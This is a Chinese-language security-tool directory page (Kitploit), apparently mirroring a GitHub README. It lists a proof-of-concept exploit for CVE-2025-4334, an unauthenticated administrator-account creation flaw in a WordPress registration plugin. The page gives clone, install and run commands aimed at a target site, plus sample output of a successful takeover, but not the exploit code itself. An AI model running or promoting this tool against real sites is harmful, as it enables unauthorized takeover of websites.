Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4334 — CVE-2025-4334的概念验证漏洞利用,这是Simple User Registration WordPress插件(<= 6.3)中的权限提升漏洞,允许未认证攻击者创建管理员账户。 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
权限提升密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

CVE-2025-4334的概念验证漏洞利用,这是Simple User Registration WordPress插件(<= 6.3)中的权限提升漏洞,允许未认证攻击者创建管理员账户。

查看仓库
4111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WordPress 标志

CVE-2025-4334 - Simple User Registration <= 6.3 未认证权限提升

漏洞利用标题: Simple User Registration <= 6.3 – 未认证权限提升
作者: Gaurav Bhattacharjee (0xgh057r3c0n)
CVE ID: CVE-2025-4334

此漏洞利用针对 WordPress 的 Simple User Registration 插件(<= v6.3) 中的一个漏洞,允许 未认证的攻击者 提升权限并创建新的管理员账户。


⚙️ 安装

克隆仓库并安装所需的 Python 依赖:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

依赖项:

  • requests
  • colorama

🚀 使用方法

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

参数:

  • -u / --url → WordPress 基础 URL(例如 https://target.com/wordpress/)
  • --form → 注册表单的完整 URL(例如 https://target.com/wpr/default-registration/)

示例:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 示例输出

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ 免责声明

此工具仅供 教育和研究目的 使用。
未经许可在系统上使用是违法的。
作者对滥用 不承担任何责任。


📄 许可证

本项目基于 MIT 许可证 进行许可。


下载工具